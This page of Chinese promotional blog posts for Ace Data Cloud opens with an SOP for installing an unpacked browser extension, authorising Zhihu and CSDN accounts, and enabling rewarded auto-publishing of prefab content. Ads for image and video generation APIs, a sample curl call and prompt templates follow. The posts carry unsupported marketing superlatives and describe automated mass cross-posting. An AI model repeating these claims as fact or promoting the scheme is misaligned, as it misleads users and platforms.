Google SERP 99.9可用性！ACE Data Platform Google SERP API：3秒解锁全球搜索流量密码，SEO/跨境人必藏

活动：2026.1.21~2026.1.27 期间开通自动发布并成功截图，可获得每日最高 50 积分≈￥48奖励（发布一个平台 10 积分），每日统计，可以叠加。

本 SOP 用于指导团队完成两件事：
1）安装 Ace Data Cloud 浏览器插件并完成账号授权；
2）在 Ace Data Cloud 平台完成频道绑定、内容准备、发布与自动发布。

1. 目标与概述

目标：通过 Ace Data Cloud 平台，将文章/视频等内容分发到多个自媒体平台（频道），提升分发效率，并通过自动发布实现“低人工投入”的持续推广。
前置条件：
- 使用 Chrome 浏览器
- 可访问 Ace Data Cloud 平台
- 已下载浏览器插件压缩包并解压
- 浏览器插件配置文档（平台内）：链接

2. 核心概念说明

浏览器插件：用于在第三方平台（如知乎、CSDN 等）完成账号授权，使 Ace Data Cloud 能代表你执行发布。
频道（Channels）：目标发布平台的账号授权通道（如知乎、CSDN、掘金等）。
材料（Materials）：平台提供的可直接使用/参考的预制内容库。
文档（Docs）：你准备发布的内容草稿（可由材料生成，也可自己创建）。
发布任务（Tasks）：每一次发布操作生成的记录，用于追踪状态、链接与结果。

3. 插件安装 SOP

3.1 下载插件

访问下载链接并下载压缩包：
- https://cdn.acedata.cloud/i9h4af.zip
解压后得到一个插件文件夹（保持文件夹结构不变）。

3.2 安装插件（Chrome）

在 Chrome 地址栏输入：chrome://extensions
打开右上角 开发者模式（Developer mode）
点击 Load unpacked（加载已解压的扩展程序）
选择你刚刚解压出来的插件文件夹并确认

3.3 安装成功验证

打开 Ace Data Cloud 分发中心页面并刷新：
- https://platform.acedata.cloud/console/publish
如果页面不再出现“未安装浏览器插件”的提示，则安装成功。

4. 内容发布平台 SOP（含截图）

以下 SOP 以平台页面为主线：分发中心 → 频道 → 文档/材料 → 发布任务 → 自动发布
截图说明：

截图1：发布中心

截图2：频道管理

截图3：发布任务

截图4：发布概览/摘要

4.1 步骤一：进入发布中心（总览与自动发布开关）

目标：确认插件状态正常，并了解“自动发布”入口与整体状态。

操作：

进入分发中心： https://platform.acedata.cloud/console/publish
检查是否存在“未安装插件”等异常提示
熟悉页面内的自动发布模块、整体概览信息

检查点：

页面正常显示，无插件缺失提示
能看到自动发布模块（开关/说明）

截图1（发布中心）
截图1-发布中心

4.2 步骤二：绑定发布频道（授权第三方账号）

目标：将第三方平台账号授权给 Ace Data Cloud，建立发布通道。

操作：

进入频道页面： https://platform.acedata.cloud/console/publish/channels
找到需要绑定的平台（如知乎、CSDN 等）
点击绑定，按提示完成第三方平台登录与授权
绑定成功后，频道状态应变为有效

检查点：

目标平台频道状态显示有效
可绑定多个频道以实现“一文多发”

截图2（频道管理）
截图2-频道管理

4.3 步骤三：准备内容（从材料库创建文档 / 编辑文档）

目标：获得可发布的文章草稿，并进行必要编辑。

常见路径 A：从材料库选取并生成文档

在“材料”库中浏览/搜索内容
查看标题、内容与支持频道
点击预览确认内容适用
点击使用：系统会将材料复制到你的“文档”列表，形成可编辑草稿

常见路径 B：创建原创文档（如平台支持“新建文档”）

在“文档”页面点击新建
输入标题与正文，保存为草稿

检查点：

文档已生成并可进入编辑页
标题、正文、格式符合目标平台发布要求

4.4 步骤四：手动发布（选择频道并生成发布任务）

目标：将指定文档发布到已绑定的多个频道。

操作：

在“文档”列表找到目标文章
进入编辑页完成最终检查（标题优化、排版、链接等）
点击发布
在弹窗中勾选要发布的频道
确认发布 → 系统创建 发布任务

检查点：

发布任务已生成
状态从“进行中”变为“已完成”
可点击任务中的链接，跳转第三方平台确认文章已发布

4.5 步骤五：查看发布任务（追踪状态与结果链接）

目标：统一查看手动/自动发布的历史与结果。

操作：

进入发布任务页面（或从分发中心进入任务列表）
查看任务状态、发布时间、目标频道与外链
异常任务根据提示重试或重新授权频道

检查点：

任务状态清晰可追踪
已完成任务具备可访问的外链

截图3（发布任务）
截图3-发布任务

4.6 步骤六：启用自动发布（全自动分发）

目标：开启自动发布后，系统按规则自动选取内容并发布到“有效频道”。

操作：

返回 发布中心
找到 自动发布 模块
将开关从“关闭”拨动至“打开”
后续定期到“发布任务”确认系统自动创建的任务与完成情况

检查点：

自动发布开关处于开启状态
发布任务中持续出现自动任务记录

截图4（发布概览/摘要）
截图4-发布概览

5. 常见问题（FAQ）

Q1：频道绑定失败 / 状态显示“已过期”怎么办？

建议操作：先解绑再 重新绑定，按页面提示重新完成授权登录。
若仍失败：检查浏览器插件是否安装启用、第三方平台是否触发风控/二次验证。

Q2：可以发布我自己写的原创文章吗？

可以。一般在“文档”页面支持 新建文档，创建后按“手动发布”流程发布。

Q3：自动发布的内容不喜欢，可以干预吗？

可以。随时关闭发布中心的 自动发布 开关。
同时你也可以只绑定你希望自动分发的平台频道，减少不期望的平台覆盖。

Q4：如何查看发布效果（阅读量/互动等）？

在 发布任务 中点击外链进入第三方平台查看数据；
平台内若有统计模块，也可在概览/报表中查看汇总。

6. 总结（最短路径）

插件安装成功 → 绑定频道（有效） → 准备文档 → 发布并查看任务 → （可选）开启自动发布

作者崔庆才发表于 2026-01-18 阅读次数：本文字数： 2.3k 阅读时长 ≈ 2 分钟

Nano Banana Nano Banana API 来了：不到半价享官方同款品质，仅需约 ¥0.10/张！

最近被谷歌新发布的 Nano Banana（Gemini 2.5 Flash Image）图像生成模型 霸屏了。

从手办秒变真人级 Cosplay，到一键统一多图风格，从个性化头像到产品概念设计，甚至连静态画作都能一键生成电影级动态分镜——这波 AI 生图浪潮，真的在重新定义创作！

Ace Data Cloud 平台 https://platform.acedata.cloud 现也推出 Nano Banana API：价格：约 ¥0.10/张，成本相比官方直接省一半，性能效果毫不打折。是更快、更稳、更省钱的图片生产线

Nano Banana 强在哪？

它最厉害的地方，是能轻松实现 高精度的一致性生成。
无论是换背景、改风格、调表情，还是处理复杂动作与服装，过渡都非常自然，效果高度统一，几乎看不出 AI 生成的痕迹！

超实用的玩法示例

1. 2D 图片转 3D 手办

当前最火的出圈玩法！

指令：生成一幅图片中角色的商品化模型，环境写实。模型放电脑桌上，使用圆形亚克力底座。电脑屏幕显示建模过程，旁边放置印有原图的 BANDAI 包装盒。

2. 产品内部结构解析

提示词：超详细的产品爆炸视图，金属零件和电子元件漂浮在半空中，完美排列，揭示内部结构，未来主义技术美学，8K 分辨率，柔和的电影照明，高度逼真。背景是纯白色。

3. 老照片修复

提示词：请修复这张充满划痕的黑白老照片。移除所有污点和破损，大幅提升清晰度，并进行自然、逼真的上色。

4. 多元素组图 / 电商产品植入

提示词：一位模特站在一辆白色的车前面摆拍，场景为街区路面，两边是建筑。她穿着黑色连衣裙和白色高跟鞋，一手拎着白色的包。

还有更多实用场景：一键换装/换表情/换动作、多角度镜头、人物合影、表情包九宫格、模特 OOTD 服装平铺展示、手稿转 3D 实物图、建筑等轴测建模、地图转实景解析……统统都能高效完成！

在展示了 Nano Banana 如此多令人惊艳的玩法之后，你可能会想：这么强大的能力，接入起来一定很复杂，成本也很难控制吧？
无论是 AI 产品的开发者想要快速集成，还是个人用户希望直接体验，Ace Data Cloud 都让这一切变得简单、可控且经济。

价格

说到价格，Ace Data Cloud 绝对是你的性价比之选：

Google 官方：约美元 $0.039/张，按 $1 ≈ ¥7.2 计算，人民币大约 ¥0.28/张。
AceDataCloud：统一 ¥0.10/张。

另外并发支持更宽裕，响应更稳定，提供专属客服，7×24 小时可用性保障，具体价格与配额请见：https://platform.acedata.cloud/services/nano-banana。

快速接入，立即体验高品质低成本图像生成！

我们提供简洁的 API 和完整的开发文档，助你快速集成到既有工作流或新产品。

开发集成文档：https://platform.acedata.cloud/documents/nano-banana-images-integration
立即购买与使用：https://platform.acedata.cloud/documents/nano-banana-images-integration
技术支持与咨询：随时联系我们的技术团队：https://platform.acedata.cloud/support

下面是样例调用说明，轻松一个 API 就能得到你想要的效果：

curl -X POST 'https://api.acedata.cloud/nano-banana/images' \
  -H 'authorization: Bearer {token}' \
  -H 'accept: application/json' \
  -H 'content-type: application/json' \
  -d '{
    "action": "generate",
    "prompt": "A photorealistic close-up portrait of an elderly Japanese ceramicist with deep, sun-etched wrinkles and a warm, knowing smile. He is carefully inspecting a freshly glazed tea bowl. The setting is his rustic, sun-drenched workshop. The scene is illuminated by soft, golden hour light streaming through a window, highlighting the fine texture of the clay. Captured with an 85mm portrait lens, resulting in a soft, blurred background (bokeh). The overall mood is serene and masterful. Vertical portrait orientation."
  }'

返回结果：

{
  "success": true,
  "task_id": "056f0589-a3dd-4ec2-8440-ad61f5038dfa",
  "trace_id": "c48de83f-0077-426e-b02b-ff1d58179064",
  "data": [
    {
      "prompt": "A photorealistic close-up portrait of an elderly Japanese ceramicist with deep, sun-etched wrinkles and a warm, knowing smile. He is carefully inspecting a freshly glazed tea bowl. The setting is his rustic, sun-drenched workshop. The scene is illuminated by soft, golden hour light streaming through a window, highlighting the fine texture of the clay. Captured with an 85mm portrait lens, resulting in a soft, blurred background (bokeh). The overall mood is serene and masterful. Vertical portrait orientation.",
      "image_url": "https://platform.cdn.acedata.cloud/nanobanana/69790adb-c85d-4362-ad9e-0c9ba4352cf4.png"
    }
  ]
}

其中 image_url 就是 Nano Banana 生成的的图片，永久可访问。

总结

好了，以上就是 Ace Data Cloud 的 Nano Banana API 的介绍，快来试试吧！

作者崔庆才发表于 2026-01-17 阅读次数：本文字数： 2.8k 阅读时长 ≈ 3 分钟

nano-banana 刷屏全网的“nano-banana”API接入指南！0.1元/张量产高清创意图，开发者必藏

一、nano-banana 爆火背景与核心优势

最近 AI 圈彻底被“纳米香蕉”承包！X 平台 16 万浏览量的 3D 手办生成图、网友复刻的《黑神话·钟馗》周边、老照片修复、跨时空合照等玩法刷屏全网。其本质是谷歌 Gemini 2.5 Flash Image 模型的“隐藏款”，通过 API 调用可将“创意超能力”植入自有产品或工作流。

官方API痛点

官方 API 存在两大核心问题：① 成本高，0.039 美元/张（约0.28元）；② 受网络限制，大规模调用成本压力大。

ACE Data Platform 生态加持优势

推荐 ACE Data Platform的nano-banana API 接入方案（专属对接链接：ACE Data Platform nano-banana API专属对接页面），核心优势：兼顾低成本（0.1 元/张量产）、高稳定、强扩展性，适配个人创作与商业部署全场景。

二、4 大核心能力（碾压同类的硬实力）

nano-banana API 凭以下 4 大功能成为开发者“生产力利器”：

角色一致性拉满：多次编辑可精准保留人物脸部特征、发型与服装风格，更换场景、调整姿势后主体辨识度仍在线；适配虚拟试衣 APP、连贯故事分镜生成等场景，无需反复调整参数。
多图融合自然到离谱：支持一次性上传 13 张素材图，智能整合光线、阴影、透视关系，实现“原生融合”而非简单拼接；电商商家可合成产品场景图，设计师可快速组合创意元素，效率提升 10 倍以上。
多轮编辑像“聊天”一样简单：支持基于上一轮结果持续微调，如为空房间逐步添加家具、粉刷墙壁，或给生成图换风格、改细节；无需每次重新描述全部需求，对话式操作堪比真人设计师协作。
生成速度快到飞起：“Flash”命名名副其实，复杂指令下13秒可生成5张风格各异的高清图，单张生成耗时不足3秒，完全满足商业场景高并发需求。

三、4 大落地场景（覆盖从创意到商业的全需求）

nano-banana API 适配性极强，个人创作者与企业开发均能找到核心价值：

内容创作领域：自媒体人生成短视频封面、故事板；设计师借助风格迁移功能快速尝试不同创意方向，将 1 天工作量压缩至 1 小时。
电商营销场景：生成多角度产品展示图、将商品自然植入生活场景；无需搭建实景拍摄，即可产出高质量营销素材，大幅降低推广成本。
娱乐应用开发：开发虚拟试衣、宠物变装、老照片修复等趣味功能；依托强互动性提升产品用户留存率。
企业级创意生产：品牌方批量生成品牌一致的广告素材，游戏公司制作角色周边可视化图；借助API实现“创意量产”，缩短项目周期。

四、2 套接入方案（避坑指南：成本直降+稳定翻倍）

针对不同需求提供适配方案，规避官方API网络波动、高成本、失败计费等问题：

1. 个人学习/小规模测试

方案：直接使用网页版（链接：nano-banana 网页版（无需配置，即开即用））
优势：无需任何网络配置，联网即可使用，操作便捷。

2. 商业部署/大规模调用（推荐方案）

方案：通过 ACE Data Platform接入nano-banana API（专属通道：ACE Data Platform nano-banana API 专属对接页面）
3大核心优势：
① 成本更友好：生态协同降低中转成本，大规模调用享阶梯价，失败调用不计费，比直接对接官方节省 30% 以上成本；
② 网络更稳定：国内直连节点，无需额外配置代理，API可用性高达 99.9%，避免网络波动导致创作或开发中断；
③ 生态更完整：可直接联动 ACE Data Platform 的其他 API 和编排系统，实现进一步自动化。

五、3 步快速接入流程（即刻解锁创意超能力）

注册 ACE Data Platform 账号，进入 nano-banana API 专属对接页面（链接：ACE Data Platform nano-banana API专属对接页面），获取专属API Key；
参考平台提供的开发文档（含Python、JavaScript等多语言示例代码），根据需求配置参数（支持图像生成、编辑、风格迁移等多种指令）；
发起调用并对接自有系统，生成的图像可直接存储至 ACE Data Platform 平台云空间。

六、总结号召

从网友整活的趣味工具，到开发者追捧的生产力 API，nano-banana 的爆发绝非偶然。借助 ACE Data Platform的生态加持，不仅能低成本接入，更能通过数据联动实现价值升级。无论你是想做创意工具、电商产品，还是企业级营销系统，nano-banana API 都是不可错过的核心能力，赶紧领取免费额度，开启创意爆发之旅！

作者崔庆才发表于 2026-01-16 阅读次数：本文字数： 1.8k 阅读时长 ≈ 2 分钟

Veo Veo API：0门槛量产商业级视频！2026视频流量密码，创作者/商家必藏

2026 年流量主战场已锁定视频端！小红书 15 秒种草视频 10万+ 赞、抖音 30 秒品牌故事破百万播放、视频号直播切片单日引流 500+ 精准客资… 但 90% 想靠视频变现的人，都被这些难题卡住：

专业剪辑要学 3 个月，新手望而却步；
找团队拍 1 条商业视频花 2000+，中小商家扛不住；
批量产出就掉画质，同质化严重没流量；
AI 生成视频参数复杂+网络受限，劝退99%开发者

别慌！刷屏创作者圈的「视频量产神器」——Veo API 来了！AI 驱动的视频生成与编辑 API，让你 0 专业门槛、低成本批量产出高清商业级视频，更有 Ace Data Platform 生态加持（专属对接链接：Ace Data Platform 官网），稳定省心，个人创作、企业部署全 hold 住！

一、4 大核心能力封神！Veo 凭什么成生产力救星？

直接把视频制作效率拉到天花板，全网创作者疯狂跟风的硬实力：

文本/图片一键转视频，小白也能 1 分钟出片
输入文字脚本、上传产品图/素材图，Veo 自动匹配场景、添加转场特效、生成字幕和背景音乐，无需手动调参！种草视频、产品介绍、知识科普全搞定，1 分钟干完别人 1 天的活。
4K 超清画质+多风格适配，商业级质感拉满
支持 4K/1080P 超清输出，色彩还原度超高、细节无模糊！ins 风、国潮风、科技感、治愈系等 100+ 风格模板任选，还能自定义品牌色调、水印，助力打造专属 IP，质感碾压同行。
智能剪辑+批量生成，效率直接翻 10 倍
批量导入脚本生成多条视频，自动规避重复片段；智能截取高光，精准适配小红书（15s）、抖音（30s）、视频号（60s）等平台时长要求，无需二次修改，日更不熬夜。
多模态交互+高兼容性，开发 10 分钟接入
支持文本、图像多模态指令，可对接自有素材库；适配 Python、JavaScript 等全主流编程语言，提供详细开发文档和示例代码，新手开发者也能快速上手调试。

二、5 大落地场景，覆盖从个人到企业全需求

不同用户都能找到核心价值，流量变现、降本增效一把抓：

自媒体创作：批量生成知识科普、书单/影单分享、短视频封面，轻松维持日更，抢占流量红利，不用熬夜剪辑！
电商营销：产出产品多角度展示、场景化种草、直播切片视频，无需实景拍摄，营销素材成本直降 90%，转化率提升3倍+！
企业培训：文字手册、PPT 一键转动画培训视频，生动易懂，员工学习效率翻倍；还能批量生成不同岗位定制化内容！
品牌营销：批量产出品牌宣传、节日营销、活动预热视频，风格统一覆盖全平台，快速提升品牌曝光度和用户记忆点！
娱乐开发：开发视频变装、AI 换脸、老视频修复等趣味 APP 功能，强互动性拉满用户留存率和分享欲，打造爆款应用！

三、避坑指南！成本直降 1/3

商业部署/大规模调用：Ace Data Platform 协同方案（强推！）
通过专属通道接入（链接：Veo API专属对接页），3大优势解决所有痛点：

成本更低：阶梯定价+失败调用不计费，比官方直连节省 30%+ 成本，中小商家无压力；
网络更稳：国内直连专属节点，无需额外配置代理，API 可用性 99.9%，批量生成不卡顿、不中断；
生态更全：联动平台其他 API，可以实现更高效率生成视频，一站式解决您制作视频的所有步骤。

四、3 步快速接入，解锁视频量产超能力

注册 Ace Data Platform 账号，进入Veo API 专属对接页，领取专属 API Key；
参考多语言示例代码（含 Python、JavaScript 等），按需配置文本转视频、图片转视频、智能剪辑等参数；
发起调用并对接自有系统/创作工具，生成视频自动存储至平台云空间！

五、限时福利！手慢无！

新用户注册 Ace Data Platform，直接解锁 Veo API 免费体验额度！
无套路！个人/企业通用 | 零成本试错 | 即领即用！
点击直达领取：Veo API 免费体验通道

2026 视频流量风口，拼的就是「量产能力」+「内容质感」！Veo API 帮你跳过专业门槛、砍掉高成本，Ace Data Platform 生态更让视频创作从“盲目产出”升级为“精准变现”～

不管你是想靠短视频变现的自媒体人，还是想降本增效的电商商家、企业营销人员，这波免费体验机会千万别错过！先体验再决策，零风险开启视频量产爆发之旅！

作者崔庆才发表于 2026-01-14 阅读次数：本文字数： 1.7k 阅读时长 ≈ 2 分钟

Sora 10秒解锁电影级视频！ACE Data Platform Sora2 API：0代码量产，小白/商家必藏

还在为做视频发愁？专业剪辑学不会、找团队拍1条要花2000+、AI生成视频参数复杂搞不懂、批量做还总卡顿失败？别让技术门槛挡住视频流量红利！

ACE Data Platform重磅推出Sora 2 API专属集成方案，彻底打破视频创作的技术壁垒——不用写1行代码、不用懂专业知识，输入文字、上传图片就能生成4K电影级视频，还送免费额度+99.9%稳定服务，个人创作、企业批量产出全hold住！专属对接链接：ACE Data Platform Sora 2 API 开通页

一、核心优势：为什么大家都选ACE集成Sora 2？

对比传统视频制作和普通AI工具，ACE专属方案直接戳中痛点：

0代码上手：不用懂技术，全程可视化操作，小白1分钟就能出片；
双版本灵活选：基础版支持10-15秒短视频，高级版能做25秒长视频，满足不同场景；
3种生成模式：文本生视频、图片变视频、定制虚拟角色视频，想要的效果都能实现；
批量生成不卡顿：支持一次做多条，生成过程不占用设备，结果自动通知你；
省心又省钱：国内直接使用，不用额外配置，生成视频自动备份，成本比找团队低90%。

二、3步免费开通：1分钟解锁视频超能力

开通流程简单到离谱，不用复杂审核，人人可领免费额度：

点击专属链接：ACE Data Platform Sora 2 API 开通页；
点击页面“Acquire”按钮，没注册的话简单填信息注册登录，自动返回开通页；
开通成功后，系统直接送免费额度，就能立刻开始生成视频。

三、核心功能：3种生成方式，满足所有视频需求

1. 文本生视频：输入文字，10秒出片

想做产品介绍、知识科普、种草短视频？直接打字描述场景（比如“猫咪在河边奔跑，电影感风格”），选择视频时长（10/15/25秒）、清晰度（标清/高清）和画幅（横屏/竖屏/正方形），一键生成专业视频，不用手动调任何参数。

2. 图片变视频：上传素材，让静态图动起来

有产品图、风景图、设计素材？上传图片后，补充文字描述想要的动态效果（比如“产品缓慢旋转展示，背景渐变”），就能生成连贯视频，适合电商产品展示、场景复刻，风格和图片保持一致。

3. 定制角色视频：打造专属虚拟形象

想有专属虚拟IP、品牌形象？上传一段不含真人的参考视频，就能生成该角色在不同场景的视频（比如让虚拟代言人在门店介绍产品），还能控制角色出现的时间和位置，重复复用不重样。

4. 批量生成+自动通知：高效不费心

需要一次做几十上百条视频？提交需求后不用盯着等，系统后台自动处理，生成完成后会通过你设置的方式通知你，视频自动备份，随时查看下载，批量产出也能保证画质和效率。

四、4大落地场景：不管你是谁，都能靠视频变现

跨境电商商家：生成产品多角度展示视频、场景化种草视频，不用搭建实景拍摄，适配TikTok、亚马逊等平台，转化率直接提升；
自媒体创作者：批量产出知识科普、书单分享、短视频素材，1天能做几十条，轻松维持日更，抢占平台流量；
品牌营销：定制品牌专属虚拟形象，制作宣传短片、节日营销视频，风格统一不重样，提升品牌曝光度；
企业培训：把文字手册、PPT变成生动的动画视频，不同岗位可定制专属内容，员工学习更高效，培训成本大减。

五、平台背书+限时福利：零风险试错，放心用！

靠谱保障，用得安心：

稳定性强：99.9%时间正常可用，国内直接连接，不会卡顿中断；
服务贴心：有24小时在线客服，遇到问题随时解决，不用自己琢磨；
生态完善：生成的视频自动存储，还能对接流量分析工具，帮你优化视频效果。

限时免费福利，手慢无：

新用户注册就送免费视频生成额度，无套路、无强制消费，个人和企业都能领：

免费额度：文本生视频、图片变视频功能都能试；
邀请福利：邀请好友注册，有机会得返现，永久有效！

点击直达开通：ACE Data Platform Sora 2 API 免费领额度

结语

2026年流量风口就在视频端，而ACE Data Platform Sora 2 API 让“0代码、低成本、批量出高质量视频”成为现实！不管你是想靠短视频变现的自媒体人，还是想降本增效的电商商家、企业负责人，都能轻松解锁视频创作超能力。

现在领免费额度，零风险试错，1分钟就能做出第一条电影级视频，抢占流量红利！有任何疑问，直接联系客服就能获取一对一指导～

作者崔庆才发表于 2026-01-13 阅读次数：本文字数： 1.7k 阅读时长 ≈ 2 分钟

SeeDream 0代码生成4K高清图！ACE Data Platform × SeeDream 专属方案：小白商家闭眼冲”

还在为图片创作发愁？找图怕侵权、请设计师1张图要花几百块、AI生成模糊不清、复杂工具半天学不会？别让技术和成本挡住你的创意！

ACE Data Platform 重磅推出 SeeDream 图像生成专属集成方案，把登顶国际榜单的AI生图能力变成“傻瓜式工具”——不用写1行代码、不用懂设计技巧，打字描述、上传图片就能生成4K电影级高清图，新用户直接送免费额度，个人创作、企业批量产出全搞定！专属开通链接：ACE Data Platform SeeDream 免费领额度

一、核心优势：为什么选ACE集成SeeDream？

对比普通生图工具，ACE专属方案精准戳中痛点，新手也能秒上手：

0门槛操作：全程可视化界面，不用懂任何技术，打字说话就能生图，1分钟出结果；
4K高清画质：支持超高清图片生成，细节拉满，印刷、大屏展示都够用，比普通工具清晰2倍；
3大核心功能：文本生图、图片编辑、组图生成，覆盖所有图片需求，中文描述也能精准识别；
稳定不卡顿：国内直接连接，99.9%可用率，批量生成几十上百张也不中断；
省心又省钱：生成图片自动备份，成本比请设计师低90%，还送免费额度，零风险试错。

二、3步免费开通：1分钟解锁生图超能力

开通流程简单到离谱，不用复杂审核，人人可领免费额度：

点击专属链接：ACE Data Platform SeeDream 开通页；
点击页面“Acquire”按钮，没注册的话简单填信息注册登录，自动返回开通页；
开通成功后，系统直接送免费额度，立马就能开始生成图片。

三、核心功能：3种玩法，满足所有图片需求

1. 文本生图：打字描述，秒出高清图

想要产品图、插画、海报、表情包？直接用中文描述画面（比如“日系清新风格的咖啡杯，白色背景，4K高清”），选好尺寸（横屏/竖屏/正方形），一键生成专业图片，不用手动调任何参数。

2. 图片编辑：上传素材，想改就改

有现成图片想优化？上传图片后，用文字说明修改需求（比如“把衣服材质换成透明玻璃，保留人物姿势”“去除背景，换成蓝色渐变”），AI自动适配风格，修改效果自然不生硬。

3. 组图生成：一次出一套，内容相关不重样

需要系列配图、多场景展示图？输入核心主题（比如“小红书养生图文系列，统一卡通风格”），系统会生成一组内容关联、风格统一的图片，适合自媒体连载、产品多维度展示。

4. 批量生成+自动通知：高效不费心

需要大量图片？提交需求后不用盯着等，系统后台自动处理，生成完成后会及时通知你，图片自动保存，随时查看下载，批量产出也能保证画质一致。

四、5大落地场景：不管你是谁，都能靠图提效

电商商家：生成产品白底图、场景化种草图、详情页配图，不用搭建实景拍摄，转化率直接提升；
自媒体创作者：批量产出封面图、表情包、知识卡片，1天能做几十套，轻松维持日更，抢占平台流量；
品牌/设计师：快速生成LOGO初稿、海报方案、活动视觉图，节省创意时间，还能定制专属风格；
企业办公：把PPT、文字手册变成生动插图，制作培训课件、宣传物料，不用等设计部门排期；
个人用户：生成旅行打卡图、社交头像、节日祝福图，创意不限，想怎么玩就怎么玩。

五、平台背书+限时福利：放心用，不踩坑

靠谱保障，用得安心：

技术硬核：SeeDream模型拿下国际生图榜单第一，中文理解能力超强，指令执行超精准；
服务贴心：ACE Data Platform提供24小时在线客服，遇到问题随时解决，不用自己琢磨；
生态完善：生成的图片可直接对接流量分析工具，还能一键分享到社交平台，创作传播一步到位。

限时免费福利，手慢无：

新用户注册就送 免费图片生成额度，无套路、无强制消费，个人和企业都能领

点击直达开通：ACE Data Platform SeeDream 免费领额度

结语

2026年，好图片就是流量密码！ACE Data Platform × SeeDream 让“0代码、低成本、批量出4K高清图”成为现实，不管你是想省时间的自媒体人、想降本增效的商家，还是爱创意的普通人，都能轻松解锁图片创作超能力。

现在领免费额度，零风险试错，1分钟就能做出第一张专业级图片，抢占流量红利！有任何疑问，直接联系客服就能获取一对一指导～

更有海量prompt供大家直接使用，示例如下：

电商营销专属：产品白底图精准模板（直接复制替换）

适配淘宝、京东、亚马逊、拼多多等主流电商平台，满足主图/详情页/活动报名要求，纯白背景（RGB 255,255,255）、无阴影、无水印、细节清晰，直接替换 [ ] 内容即可生成可用图！

一、3C数码类

手机/平板：「4K高清，[产品型号，如：iPhone 16 Pro]，纯白色背景，正面朝上平放，屏幕亮屏展示默认壁纸，边框无反光，无多余配件，800x800像素，符合淘宝主图规范」
耳机/音箱：「4K高清，[产品名称，如：无线降噪耳机]，纯白色背景，耳机主体呈佩戴状态摆放（或对称平放），展示充电盒+耳机全套，细节纹理清晰，无阴影，1000x1000像素，适配亚马逊主图」
小家电（吹风机/剃须刀）：「4K高清，[产品名称，如：负离子吹风机]，纯白色背景，机身直立摆放，展示开关、风嘴等核心部件，无电线缠绕，光线均匀，600x600像素，适合拼多多详情页」
数码配件（充电器/数据线）：「4K高清，[产品名称，如：65W氮化镓充电器]，纯白色背景，充电器+数据线自然摆放（数据线呈弧形），展示接口细节，无多余装饰，800x800像素，符合京东主图要求」

二、美妆护肤类

瓶罐类（面霜/精华）：「4K高清，[产品名称，如：玻尿酸保湿面霜]，纯白色背景，瓶身直立摆放，正面朝向镜头，标签文字清晰可辨，无瓶盖脱落，光线柔和无反光，800x800像素，适配淘宝主图」
彩妆类（口红/眼影盘）：「4K高清，[产品名称，如：哑光雾面口红]，纯白色背景，口红旋出1/3长度，膏体颜色均匀，外壳无划痕，单独摆放（眼影盘需开盖展示内格颜色），1000x1000像素，符合亚马逊要求」
面膜类（片状/涂抹式）：「4K高清，[产品名称，如：补水面膜]，纯白色背景，单片面膜平铺展开（涂抹式面膜需展示罐身+挖勺），无褶皱，包装文字清晰，600x600像素，适合拼多多详情页」
美妆工具（化妆刷/粉扑）：「4K高清，[产品名称，如：10支化妆刷套装]，纯白色背景，刷子整齐排列（刷头朝左/右），展示刷毛细节，无掉毛，手柄直立无倾斜，800x800像素，适配京东主图」

三、服装鞋帽类

上衣/裤子：「4K高清，[产品名称，如：纯棉宽松T恤]，纯白色背景，衣物平铺拍摄（或用模特架支撑），正面展示，无褶皱，颜色还原准确，无吊牌外露，1000x1000像素，符合淘宝主图规范」
鞋子（运动鞋/皮鞋）：「4K高清，[产品名称，如：透气运动鞋]，纯白色背景，单只鞋子斜45°摆放（或两只对称摆放），展示鞋型、鞋底纹路，无鞋带松散，光线均匀，800x800像素，适配亚马逊主图」
配饰（包包/围巾）：「4K高清，[产品名称，如：帆布托特包]，纯白色背景，包包自然撑开（内置填充物保持形状），展示开口、肩带细节，无污渍，600x600像素，适合拼多多详情页」
内衣/袜子：「4K高清，[产品名称，如：无痕内裤]，纯白色背景，衣物平铺无褶皱，颜色均匀，无标签外露，单独摆放（袜子可成对叠放），800x800像素，符合京东主图要求」

四、家居日用类

厨具类（锅具/餐具）：「4K高清，[产品名称，如：不粘平底锅]，纯白色背景，锅具直立摆放（或平铺展示锅底），无油污，手柄无松动，展示锅口边缘细节，1000x1000像素，适配淘宝主图」
家纺类（床单/枕套）：「4K高清，[产品名称，如：全棉印花床单]，纯白色背景，床单平铺展开，图案居中展示，无褶皱，颜色还原准确，800x800像素，符合亚马逊要求」
清洁用品（洗衣液/洗洁精）：「4K高清，[产品名称，如：天然植物洗衣液]，纯白色背景，瓶身直立摆放，正面朝向镜头，标签文字清晰，无漏液痕迹，600x600像素，适合拼多多详情页」
收纳用品（收纳盒/衣架）：「4K高清，[产品名称，如：抽屉式收纳盒]，纯白色背景，收纳盒开盖展示内部隔层，无变形，颜色均匀，单独摆放（衣架可成组排列），800x800像素，适配京东主图」

五、食品饮料类

包装食品（零食/饼干）：「4K高清，[产品名称，如：无蔗糖饼干]，纯白色背景，包装正面朝向镜头，文字图案清晰，无破损、无胀气，单独摆放（多包可整齐排列），800x800像素，符合淘宝主图规范」
瓶装饮料（果汁/矿泉水）：「4K高清，[产品名称，如：鲜榨橙汁]，纯白色背景，瓶身直立摆放，标签居中，液体颜色均匀，无沉淀物，光线柔和无反光，1000x1000像素，适配亚马逊主图」
生鲜食品（水果/蔬菜）：「4K高清，[产品名称，如：进口车厘子]，纯白色背景，3-5颗果实自然摆放，展示果形、色泽，无腐烂、无杂质，600x600像素，适合拼多多详情页」
干货特产（坚果/红枣）：「4K高清，[产品名称，如：原味巴旦木]，纯白色背景，坚果去壳+带壳组合摆放（或展示包装+倒出的坚果），无受潮，颗粒饱满，800x800像素，符合京东主图要求」

六、跨境电商专属（亚马逊/速卖通）

通用模板1：「High-resolution 4K, [Product Name, e.g.: Wireless Bluetooth Earbuds], pure white background (RGB 255,255,255), product placed vertically, front facing the camera, no shadows or reflections, all details clearly visible, 1000x1000 pixels, meeting Amazon main image requirements」
通用模板2：「4K ultra HD, [Product Name, e.g.: Matte Lipstick], pure white background, product displayed alone without extra accessories, labels and logos clearly legible, even lighting, 1200x1200 pixels, suitable for AliExpress main image」
复杂产品模板：「4K high definition, [Product Name, e.g.: 10-in-1 Makeup Brush Set], pure white background, brushes arranged neatly in a row, brush hair details visible, no shedding, 1000x1000 pixels, compliant with Amazon product image guidelines」

模板使用小贴士

像素建议：淘宝/京东主图推荐800x800像素，亚马逊建议1000x1000像素（支持缩放），拼多多可600x600像素（兼顾加载速度）；
光线要求：模板中已包含“光线均匀”“无反光”等关键词，生成时自动适配，无需额外添加；
产品摆放：按模板描述的“直立”“平铺”“斜45°”摆放，确保主体突出，符合电商平台审核规范；
